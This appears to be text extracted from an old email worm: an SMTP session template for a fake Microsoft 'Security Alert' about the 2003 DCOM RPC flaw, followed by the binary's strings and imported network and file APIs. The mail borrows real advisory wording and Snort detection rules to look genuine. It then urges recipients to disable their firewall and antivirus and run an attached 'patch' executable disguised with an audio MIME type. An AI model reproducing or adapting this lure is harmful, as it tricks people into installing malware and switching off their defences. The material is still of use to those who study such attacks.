RCPT TO: <>
DATA
Message-ID: ..qmail@hotmail.com
DATE: 13:37:00
FROM: Security Alert
TO:  <
Reply-to: Security Alert
SUBJECT: DCOM RPC Exploit Patch
SUBJECT: DCOM RPC Exploit
SUBJECT: Patch your Systems.
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--ABCDEF"
X-Priotity: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50
X-MimeOLE: Produced by Microsoft MimeOLE v 5.50

This is a multipart MIME-coded message
----ABCDEF
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Ever since the announcement of the RPC DCOM vulnerability,
the hacker community has been busy refining exploits in order to make use of this issue.
Over the last two weeks, a number of exploits have been released.
They are very easy to use and have already been used to attack numerous systems.
Currently, more than 1/4 of the sensors participating in the Internet Storm Center have detected scans for this vulnerability.
If successful, the exploit will be hard to detect.
Only if the exploit failed, you will see a popup alert indicating that the RPC service died. Your machine may reboot by itself as a result.
Essentially all versions of Windows are vulnerable. The only exception is Windows ME.
A patch has been made available by Microsoft as of July 16th 2003.
Recommendation:
- Patch your systems as fast as possible.
- apply firewall rules to block at least port 135, 139 and 445.
RPC may use other ports as well depending on configuration. Do not use these limited rules in lieu of patches.


SNORT Rules:
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC invalid bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|00|"; distance:21; within:1; classtype:attempted-dos; sid:2190; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC invalid bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; distance:2; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|00|"; distance:21; within:1; classtype:attempted-dos; sid:2191; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)
Patch your systems with the MS-560954 DCOM RPC exploit patch to rid of this vulnerability.Download the attachment, turn off all firewall's and Antivirus and run the patch.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 62003 Microsoft Corporation. All rights reserved
Content-Type: audio/x-wav; name="MS-56095M_PATCH.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="MS-56095M_PATCH.exe"
Content-ID:
----ABCDEF--
.
QUIT

C:\MS-56095M_PATCH.exe
C:\Listen_at_me.txt
||---------------||
||-----Z loves Laura-----------||
||----------and----------------||
||--------i miss you crow------||
||-i really do----------aug 9th||
0http://www.lunarstorm.se100600000

kernel32.dll: DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, GetStartupInfoA, GetModuleFileNameA, GetLastError, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, CreateFileA, CloseHandle
user32.dll: GetKeyboardType, MessageBoxA, CharNextA
advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll: SysFreeString
kernel32.dll: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
kernel32.dll: WritePrivateProfileStringA, Sleep, SetFilePointer, ReadFile, GetTempPathA, GetTempFileNameA, GetSystemDirectoryA, GetLastError, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, DeleteFileA, CreateFileA, CopyFileA
wsock32.dll: WSACleanup, WSAStartup, WSAGetLastError, gethostbyname, socket, send, ntohl, inet_addr, htons, connect, closesocket
DVCLAL PACKAGEINFO StillCrowUTypesSystemSysInitigmp WinSock KWindows,uBase64_SocketUnit